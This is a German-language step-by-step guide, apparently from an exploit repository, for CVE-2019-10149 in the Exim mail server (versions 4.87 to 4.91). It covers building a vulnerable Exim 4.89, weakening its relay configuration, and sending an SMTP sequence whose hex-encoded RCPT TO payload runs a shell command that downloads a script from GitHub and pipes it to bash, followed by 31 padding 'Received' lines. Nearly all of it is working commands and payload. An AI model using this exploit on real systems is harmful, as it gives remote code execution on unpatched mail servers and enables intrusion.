CVE-2019-10149 - Exim 4.87 < 4.91
Anleitung zur Installation einer verwundbaren Exim-Version und deren Ausnutzung
Getestet auf Linux Ubuntu 16.04, Exim 4.89
Exim-Installation
Laden Sie Exim Version 4.89 herunter und entpacken Sie es
Wechseln Sie in den extrahierten Ordner
Kopieren und modifizieren Sie die erforderlichen Konfigurationsdateien
-
sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile
-
cp exim_monitor/EDITME Local/eximon.conf
Exim-Benutzer und -Gruppe erstellen
Abhängigkeiten installieren
- sudo apt-get update
- sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev
Exim 4.89 installieren
Bearbeiten Sie /usr/exim/configure, um Relaying zu erlauben, damit wir ohne 7 Tage warten ausnutzen können
- sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = * /' /usr/exim/configure
- sudo sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = 0.0.0.0' /usr/exim/configure
- sudo sed -i '/require verify = recipient/c#require verify = recipient' /usr/exim/configure
Exim als Benutzer exim ausführen
- sudo -H -u exim /usr/exim/bin/exim -bd -d-receive
Erstellung des Exploits
Konvertieren Sie Ihren Shell-Befehl in Hex. Beispiel:
Tabelle für das Beispiel:
- \t-c\ = -c
- \t= Leerzeichen
- x20 = Leerzeichen
- x7C = |
- x2F = /
- x3A = :
- x2D = -
- x3E = >
- x26 = &
- x22 = "
- x2E = .
Verwendung des Exploits
Zuerst verwenden wir nc, um eine Verbindung zum Server herzustellen.
Sobald wir verbunden sind, sagen wir HELO.
- helo localhost
- (Antwort: 250 exim Hello localhost [192.168.0.168])
Als nächstes setzen wir die Absenderadresse auf leer.
- mail from:<>
- (Antwort: 250 OK)
Dann setzen wir die Empfängeradresse mit dem zuvor erstellten Payload, indem wir den gewünschten Befehl anstelle der Auslassungspunkte einfügen: rcpt to:${run{...}}@localhost.
- rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22}}@localhost>
- (Antwort: 250 Accepted)
Und schließlich geben wir zuerst DATA ein, gefolgt von 31 Zeilen, einer Leerzeile und einem Punkt.
- DATA
- Received: 1
- Received: 2
- Received: 3
- Received: 4
- Received: 5
- Received: 6
- Received: 7
- Received: 8
- Received: 9
- Received: 10
- Received: 11
- Received: 12
- Received: 13
- Received: 14
- Received: 15
- Received: 16
- Received: 17
- Received: 18
- Received: 19
- Received: 20
- Received: 21
- Received: 22
- Received: 23
- Received: 24
- Received: 25
- Received: 26
- Received: 27
- Received: 28
- Received: 29
- Received: 30
- Received: 31
- .